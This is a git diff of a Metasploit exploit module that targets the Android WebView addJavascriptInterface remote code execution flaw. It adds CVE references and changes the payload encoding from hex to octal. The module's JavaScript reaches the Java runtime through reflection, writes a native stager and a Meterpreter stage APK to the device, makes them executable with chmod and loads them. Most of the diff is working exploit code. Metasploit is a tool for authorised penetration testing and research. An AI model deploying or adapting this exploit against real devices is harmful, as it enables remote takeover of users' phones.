diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 671fe0e83d..9e3e7c232e 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -69,7 +69,11 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'], ['URL', 'http://50.56.33.56/blog/?p=314'], ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'], - ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'] + ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'], + ['CVE', '2012-6636'], # original CVE for addJavascriptInterface + ['CVE', '2013-4710'], # native browser addJavascriptInterface (searchBoxJavaBridge_) + ['EDB', '31519'], + ['OSVDB', '97520'] ], 'Platform' => 'android', 'Arch' => ARCH_DALVIK, @@ -89,8 +93,6 @@ class Metasploit3 < Msf::Exploit::Remote def on_request_uri(cli, req) if req.uri =~ /\.js/ serve_static_js(cli, req) - elsif req.uri =~ /\.msg/ && req.body.to_s.length < 100 - print_warning "Received message: #{req.body}" else super end @@ -139,28 +141,15 @@ class Metasploit3 < Msf::Exploit::Remote .getMethod('getRuntime', null) .invoke(null, null); - // now ensure we can write out a hex-encoded byte with the shell's echo builtin - var byte = exec(runtime, ['/system/bin/sh', '-c', 'echo "\\\\x66"']); - if (byte.indexOf("\\\\") > -1) { - // if youre havin byte problems - var xml = new XMLHttpRequest(); - // i feel bad for you son - xml.open('POST', '#{get_module_resource}.msg', false); - // i got \\x63 problems - xml.send("Unsupported shell echo builtin: exploit aborted."); - // but your shell aint one - return true; - } - // libraryData contains the bytes for a native shared object built via NDK // which will load the "stage", which in this case is our android meterpreter stager. // LibraryData is loaded via ajax later, because we have to access javascript in // order to detect what arch we are running. - var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename, arch), '\\\\x')}"; + var libraryData = "#{Rex::Text.to_octal(ndkstager(stagename, arch), '\\\\0')}"; // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains // another stager which loads android meterpreter from the msf handler. - var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}"; + var stageData = "#{Rex::Text.to_octal(payload.raw, '\\\\0')}"; // get the process name, which will give us our data path // $PPID does not seem to work on android 4.0, so we concat pids manually @@ -170,11 +159,11 @@ class Metasploit3 < Msf::Exploit::Remote var stagePath = path + '/#{stagename}.apk'; // build the library and chmod it - runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor(); + runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+libraryData+'" > '+libraryPath]).waitFor(); runtime.exec(['chmod', '700', libraryPath]).waitFor(); // build the stage, chmod it, and load it - runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor(); + runtime.exec(['/system/bin/sh', '-c', 'echo -e "'+stageData+'" > '+stagePath]).waitFor(); runtime.exec(['chmod', '700', stagePath]).waitFor(); // load the library (this fails in x86, figure out why)